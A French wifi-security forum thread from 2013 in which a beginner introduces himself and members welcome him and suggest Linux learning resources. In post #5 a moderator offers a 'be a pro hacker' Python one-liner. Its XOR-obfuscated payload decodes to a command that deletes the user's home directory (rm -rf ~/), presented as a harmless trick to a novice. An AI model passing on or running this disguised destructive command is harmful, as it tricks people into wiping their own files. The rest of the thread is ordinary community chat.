Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 14-11-2013 21:21:07

Fab955
Membre Irremplaçable

Bonjour à Toutes et à Tous

Salut, je me présente je suis Fab nouveau sur ce site. Je m'interesse depuis quelques jours à la sécurisatiion des réseaux et je suis en pleine découverte. J'ai donc installé BackTrack 5R3 en dur et j'ai commencé à farfouillé un peu partout dans BackTrack et sur la toile afin de trouver info, tutos, dico etc... J'avance quand meme pas trop mal pour mes débuts sur Linux. Aujourd'hui, je viens de tomber sur votre Forum et ............WOUAHHHHHHHHHH!!!!!!!!!
Je sais pas si on trouve mieux!! Sincèrement il est phénoménale votre forum. Extrêmementbien détaillé, super bien géré et propre (j'appelle par propre un sujet reste à 100% dans le même sujet jusqu'à sa cloture sans dérivation ce qui est rare!) Je suis en train de devenir accroc à Linux et je souhaite en apprendre un max. Je vais commencer par éplucher votre Forum et reviendrais vers vous si ma tite tête ne capte pas tout. :-). En tout cas il fallait que je m'arrête d'abord ici pour ces quelques lignes car le boulot que vous faites ici est vraiment énorme et excellent.
Encore Félicitation à tous pour ce petit trésors que vous nous faites partager!

A dans pas longtemps!

Ps: au passage j'aimerais apprendre Linux plus en profondeur sur ses généralités (lignes de commandes et ce à quoi elles correspondent) si vous connaissez des tutos particuliers ou bouquin. Allez je vais me fondre dans les lignes abyssales de crack-wifi.com.

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 14-11-2013 21:32:09

FFOO31
Membre d'Or

Re : Bonjour à Toutes et à Tous

bienvenue fab

#3 14-11-2013 23:17:33

Furyo
Membre Irremplaçable
Site Web

Bonjour et Bienvenue Fab wink

Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

#4 15-11-2013 07:50:58

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Bonjour et bienvenue à toi smile
C'est sympat de lire de bon matin de tels commentaires, ça fait plaisir. smile
Représente toi quand tu veux. tongue

Ps: au passage j'aimerais apprendre Linux plus en profondeur sur ses généralités (lignes de commandes et ce à quoi elles correspondent) si vous connaissez des tutos particuliers ou bouquin. Allez je vais me fondre dans les lignes abyssales de crack-wifi.com.

Personnellement ça ne fait pas beaucoup de temps que je suis passé à linux, au début je m'étais mis en tête de chercher un bouquin, ça correspondait à mes habitudes d'études, papier, stylo, deux trois marqueurs, un bouquin et à faire des fiches....
C'est bien pour te faire une idée sur l'histoire de linux, te faire une idée sur la structure du système etc... mais au bout du compte, pour quelqu"un d'un peu autodidacte, c'est vraiment fabuleux tout se matériel "nouveau" type tutoriels et forums, surtout en informatique.
Les man pages sont un peu abruptes et nécessitent un peu de lecture extra et/ou des essais pour les comprendre mais c'est fondamental, lorsque tu veux étudier à fond une commande.
Linux man pages
Heureusement il existe moultes forums et sites qui possèdent millions de thèmes en images sur des aspects de toutes ses commandes.
Le forum ubuntu est bourré d'info de tout types, excellent, celui de Archlinux aussi... très bonne wiki sur le site d'archlinux.
Un peu plus pointu, excellent à mon gout,  Stack Overflow,
Quand tu commences à faire un peu des scripts, c'est tout simplement une mine d'or, que dis-je , de diamants, le niveau de connaissance en bash est bluffant. 
Plusieurs solutions proposées et commentées pour tous les problèmes imaginables tongue.
Ah, et par rapport au crack wireless, le livre de chevet c'est la "Main" d'aircrack-ng
J'aurais du mal à t'aiguiller précisément sur un site ou un blog précis, il y a vraiment d'excellents pages ou blogs consacrés à linux et aux lignes de commandes.  Et puis tes attentes évoluent, au début tu recherches quelque chose de simple avec deux exemples concrets et ensuite tu cherches des choses plus pointues.
Dans tous les cas nous avons ici aussi une sections dédiée à GNU-Linux  une autre au script et codage pour les questions plus pointues ou tu pourras demander de l'aide ou bien partager tes trouvailles.
Go linux nux

A plus sur le forum smile

#5 15-11-2013 10:58:43

spawn
Modérateur

o/

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#6 19-11-2013 23:30:41

M1ck3y
Administrateur
Lieu : Lost in the darkness

Fab955 a écrit :

Aujourd'hui, je viens de tomber sur votre Forum et ............WOUAHHHHHHHHHH!!!!!!!!!
Je sais pas si on trouve mieux!! Sincèrement il est phénoménale votre forum. Extrêmementbien détaillé, super bien géré et propre

Je vais encore devoir sortir mon carnet de chèques, c'est la deuxième fois aujourd'hui vous allez finir par me couter cher lol

Bienvenue chez nous wink

#7 20-11-2013 16:21:13

Fab955
Membre Irremplaçable

Merci à tous de votre acceuil et merci à toi kcdtv pour toutes ces infos. Je cherche effectivement un bouquin simplement pour approfondir quelques connaissance sur le fonctionnement de Linux et les lignes de commandes de base et l'avoir sous le coude devant le pc. Je ne suis pas trop du genre à apprendre par coeur ni à bosser sur papier pour étudier le bouquin :-) mais simplment que j'aime bien lire et avoir quelques ressources sur papier. Mais dans tous les cas, je vais aller voir les liens que tu m'as fournis ça je n'y manquerait pas.

Quand à M1ck3y, ça fait longtemps que je ne prend plus les chèques suite aux nombreuses fraudes et impayés!! En revanche je prend les cartes bleus ou liquides sans soucis hmm big_smile

Encore merci à tous pour ce forum et de nous donnez de votre temps à nous aider avec ce petit bijoux.

Fab.

Dernière modification par Fab955 (20-11-2013 16:22:21)

Annonce